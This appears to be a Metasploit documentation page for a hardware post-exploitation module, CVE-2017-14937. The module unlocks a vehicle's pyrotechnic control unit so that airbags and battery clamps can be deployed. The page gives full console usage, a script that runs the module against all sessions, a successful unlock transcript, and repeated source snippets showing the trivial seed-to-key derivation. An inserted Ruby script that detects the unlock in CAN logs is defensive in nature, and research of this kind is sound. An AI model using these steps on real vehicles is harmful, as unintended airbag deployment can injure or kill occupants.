Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.) - Metasploit
This page contains detailed information about how to use the post/hardware/automotive/pdt metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Source code: modules/post/hardware/automotive/pdt.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Hardware
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-14937
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/hardware/automotive/pdt
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/hardware/automotive/pdt
msf post(pdt) > show options
... show and set options ...
msf post(pdt) > set SESSION session-id
msf post(pdt) > exploit
If you wish to run the post module against all sessions from the framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/hardware/automotive/pdt")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)
This module is based on research by Johannes Braun and Juergen Duerrwang, described in the paper listed under References along with the related CVE-2017-14937.
Options
SRCID
This is the SRC CAN ID for the PCU connection. Default is 0x7F1.
DSTID
This is the CAN ID of the expected response. Default is 0x7F9.
CANBUS
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
PADDING
Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.
Scenarios
A successful unlock that leaves the target vehicle's pyrotechnic devices prepped to deploy:
$ ./msfconsole -q
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.
msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run
[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true} Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...
hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=
[*] Gathering Data...
[*] VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*] 69 | battery clamp main battery
[*] | Deployment Status: Fail ()
[*] Number of PCUs in vehicle | 1
[*] Info About First PCU
[*] Address format this PCU(s) | 11 bit normal addressing
[*] Number of pyrotechnic charges | 1
[*] Version of ISO26021 standard | 1
[*] ACL type | CAN only
[*] ACL Type version | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success. Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
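The transcript above shows the whole exchange the module drives: a switch to diagnostic session 0x04, a SecurityAccess seed request at level 0x5F, and a key sent at level 0x60 that the module derives with the default simplified algorithm (key byte = 0xFF - seed byte, as the module source quoted further down this page shows). As an added example that is not part of the module or of this documentation, the Ruby script below recognises that exchange in a candump-style CAN log, so a bus monitor or an ECU test bench can flag a PDT-style unlock of the safety session and tell a trivially derived key from a rejected one. The candump line format is the standard `(timestamp) interface ID#DATA` layout; the sample log lines, the PCU response frames, the negative-response handling and all function names are constructed for this example, and the CAN IDs 0x7F1/0x7F9 are this page's SRCID/DSTID defaults.

```ruby
# Added example (not part of the Metasploit module or its documentation):
# detect the ISO 26021 PDT unlock sequence in a candump-style CAN log.
# The CAN IDs 0x7F1/0x7F9 are this page's SRCID/DSTID defaults; the sample
# log and the helper names below are constructed for the example.

# UDS service identifiers and subfunctions used by the module (ISO 14229)
SID_DSC    = 0x10  # DiagnosticSessionControl
SID_SA     = 0x27  # SecurityAccess
NEG_RESP   = 0x7F  # negative response SID
DSC_SAFETY = 0x04  # safety system diagnostic session (the module's "DSC 0x04")
SA_SEED    = 0x5F  # requestSeed level used by the module
SA_KEY     = 0x60  # sendKey level used by the module

CANDUMP_RE = /\A\((?<ts>[\d.]+)\)\s+(?<bus>\S+)\s+(?<id>[0-9A-Fa-f]+)#(?<data>[0-9A-Fa-f]*)\z/

# Parse one "candump -L" style line into a frame hash, or nil if it is not one.
def parse_frame(line)
  m = CANDUMP_RE.match(line.strip)
  return nil unless m
  { ts: m[:ts].to_f, bus: m[:bus], id: m[:id].to_i(16),
    data: m[:data].scan(/../).map { |h| h.to_i(16) } }
end

# The page's default simplified algorithm: key byte = 0xFF - seed byte.
# Used here only to recognise the pattern in traffic that was already captured.
def trivial_key?(seed, key)
  return false if seed.size < 2 || key.size < 2
  key[0] == (0xFF - seed[0]) && key[1] == (0xFF - seed[1])
end

# Walk the frames between tester (src_id) and PCU (dst_id) and record each
# stage of a PDT-style unlock. Single-frame ISO-TP only: data[0] is the length.
def analyze_pdt_sequence(lines, src_id: 0x7F1, dst_id: 0x7F9)
  report = { safety_session: false, seed: nil, key: nil,
             trivial_key: false, unlocked: false, nrc: nil }
  lines.each do |line|
    f = parse_frame(line)
    next unless f && [src_id, dst_id].include?(f[:id])
    len = f[:data][0] || 0
    pdu = f[:data][1, len]           # payload without the ISO-TP PCI byte
    next if pdu.nil? || pdu.empty?
    sid, sub = pdu[0], pdu[1]
    if f[:id] == src_id              # tester -> PCU requests
      report[:safety_session] = true if sid == SID_DSC && sub == DSC_SAFETY
      if sid == SID_SA && sub == SA_KEY && report[:seed]
        report[:key] = pdu[2..]
        report[:trivial_key] = trivial_key?(report[:seed], report[:key])
      end
    else                             # PCU -> tester responses
      if sid == SID_SA + 0x40 && sub == SA_SEED
        report[:seed] = pdu[2..]
      elsif sid == SID_SA + 0x40 && sub == SA_KEY && report[:key]
        report[:unlocked] = true     # positive response to sendKey
      elsif sid == NEG_RESP && sub == SID_SA
        report[:nrc] = pdu[2]        # e.g. 0x35 invalidKey, 0x36 exceededNumberOfAttempts
      end
    end
  end
  report
end

# An alert condition: the safety session was unlocked with a key that is a
# fixed function of the seed, which is this module's success path.
def pdt_alert?(report)
  report[:safety_session] && report[:unlocked] && report[:trivial_key]
end

# Constructed sample log: a successful unlock mirroring the page's seed 01 CF 00 00 00.
SAMPLE_LOG = <<~LOG
  (1513528887.100000) can0 7F1#0210040000000000
  (1513528887.102000) can0 7F9#0650040032000100
  (1513528887.110000) can0 7F1#023E000000000000
  (1513528887.120000) can0 7F1#02275F0000000000
  (1513528887.122000) can0 7F9#07675F01CF000000
  (1513528887.130000) can0 7F1#042760FE30000000
  (1513528887.132000) can0 7F9#0267600000000000
LOG

if __FILE__ == $PROGRAM_NAME
  r = analyze_pdt_sequence(SAMPLE_LOG.lines)
  puts r.inspect
  puts(pdt_alert?(r) ? 'ALERT: PDT unlock with default simplified key' : 'no PDT unlock seen')
end
```

Feed it the output of `candump -L` on the bus the PCU sits on; a negative response (SID 0x7F for service 0x27) leaves `unlocked` false and records the NRC, so a PCU that rejects the trivial key shows up as a probe rather than an alert.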
Msfconsole Usage
Here is how the hardware/automotive/pdt post exploitation module looks in the msfconsole:
msf6 > use post/hardware/automotive/pdt
msf6 post(hardware/automotive/pdt) > show info
Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Platform: Hardware
Arch:
Rank: Normal
Provided by:
Johannes Braun
Juergen Duerrwang
Craig Smith
Compatible session types:
Hwbridge
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
SESSION                   yes       The session to run this module on.
SRCID    2033             yes       Module ID to query
Description:
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT),
this module will first query all Pyrotechnic Control Units (PCUs) in
the target vehicle to discover how many pyrotechnic devices are
present, then attempt to validate the security access token using
the default simplified algorithm. On success, the vehicle will be in
a state that is prepped to deploy its pyrotechnic devices (e.g.
airbags, battery clamps, etc.) via the service routine. (ISO 26021)
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-14937
https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
Module Options
This is a complete list of options available in the hardware/automotive/pdt post exploitation module:
msf6 post(hardware/automotive/pdt) > show options
Module options (post/hardware/automotive/pdt):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
CANBUS                    no        CAN Bus to perform scan on, defaults to connected bus
DSTID    2041             no        Expected reponse ID, defaults to SRCID + 8
PADDING  0                no        Pad the packet with extra bytes to always be 8 bytes long
SESSION                   yes       The session to run this module on.
SRCID    2033             yes       Module ID to query
Advanced Options
Here is a complete list of advanced options supported by the hardware/automotive/pdt post exploitation module:
msf6 post(hardware/automotive/pdt) > show advanced
Module advanced options (post/hardware/automotive/pdt):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the hardware/automotive/pdt module can do:
msf6 post(hardware/automotive/pdt) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the hardware/automotive/pdt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(hardware/automotive/pdt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- error
- Could not switch to DSC 0x04: <ERROR>
- error
- Couldn't get seed: <ERROR>
- error
- Invalid SA Response. System not vulnerable. Error: <ERROR>
- Unknown response: <RESP.INSPECT>
- Warning! You are now able to start the deployment of airbags in this vehicle
- *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
error
Here is a relevant code snippet related to the "error" error message:
    print_status(" ACL type | #{ACL_TYPES[acl_type_definition.hex]}")
    print_status(" ACL Type version | #{acl_type_version.hex}")
    print_status
    print_status('Switching to Diagnostic Session 0x04...')
    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
    if resp.key? 'error'
      print_error("Could not switch to DSC 0x04: #{resp['error']}")
      return
    end
    # We may not need tester present at all because we will perform the action quickly
    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
Could not switch to DSC 0x04: <ERROR>
Here is a relevant code snippet related to the "Could not switch to DSC 0x04: <ERROR>" error message:
    print_status(" ACL Type version | #{acl_type_version.hex}")
    print_status
    print_status('Switching to Diagnostic Session 0x04...')
    resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
    if resp.key? 'error'
      print_error("Could not switch to DSC 0x04: #{resp['error']}")
      return
    end
    # We may not need tester present at all because we will perform the action quickly
    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
    print_status('Getting Security Access Seed...')
error
Here is a relevant code snippet related to the "error" error message:
    end
    # We may not need tester present at all because we will perform the action quickly
    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
    print_status('Getting Security Access Seed...')
    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
    if seed.key? 'error'
      print_error("Couldn't get seed: #{seed['error']}")
      return
    end
    print_status("Success. Seed: #{seed['SEED']}")
    print_status('Attempting to unlock device...')
Couldn't get seed: <ERROR>
Here is a relevant code snippet related to the "Couldn't get seed: <ERROR>" error message:
    # We may not need tester present at all because we will perform the action quickly
    send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
    print_status('Getting Security Access Seed...')
    seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
    if seed.key? 'error'
      print_error("Couldn't get seed: #{seed['error']}")
      return
    end
    print_status("Success. Seed: #{seed['SEED']}")
    print_status('Attempting to unlock device...')
    display_warning = false
error
Here is a relevant code snippet related to the "error" error message:
      print_status('Security Access Already Unlocked!!')
      display_warning = true
    else
      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
        print_error("Invalid SA Response. System not vulnerable. Error: #{resp['error']}")
        return
      end
      found_valid = false
      if (resp.key? 'Packets') && resp['Packets'].size > 0
Invalid SA Response. System not vulnerable. Error: <ERROR>
Here is a relevant code snippet related to the "Invalid SA Response. System not vulnerable. Error: <ERROR>" error message:
      display_warning = true
    else
      key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
      resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
      if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
        print_error("Invalid SA Response. System not vulnerable. Error: #{resp['error']}")
        return
      end
      found_valid = false
      if (resp.key? 'Packets') && resp['Packets'].size > 0
        resp['Packets'].each do |i|
Unknown response: <RESP.INSPECT>
Here is a relevant code snippet related to the "Unknown response: <RESP.INSPECT>" error message:
      end
      if found_valid
        print_status('Success!')
        display_warning = true
      else
        print_error("Unknown response: #{resp.inspect}")
      end
    end
    if display_warning
      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
Warning! You are now able to start the deployment of airbags in this vehicle
Here is a relevant code snippet related to the "Warning! You are now able to start the deployment of airbags in this vehicle" error message:
      else
        print_error("Unknown response: #{resp.inspect}")
      end
    end
    if display_warning
      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
    end
  end

end
*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
Here is a relevant code snippet related to the "*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***" error message:
      else
        print_error("Unknown response: #{resp.inspect}")
      end
    end
    if display_warning
      print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
      print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
    end
  end

end
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #12205 Merged Pull Request: Update module and generate splats from http:// to https://
- #9312 Merged Pull Request: Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge
References
- CVE-2017-14937
- https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
See Also
Check also the following modules related to this module:
- post/hardware/automotive/can_flood
- post/hardware/automotive/canprobe
- post/hardware/automotive/diagnostic_state
- post/hardware/automotive/ecu_hard_reset
- post/hardware/automotive/getvinfo
- post/hardware/automotive/identifymodules
- post/hardware/automotive/malibu_overheat
- post/hardware/automotive/mazda_ic_mover
Authors
- Johannes Braun
- Juergen Duerrwang
- Craig Smith
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.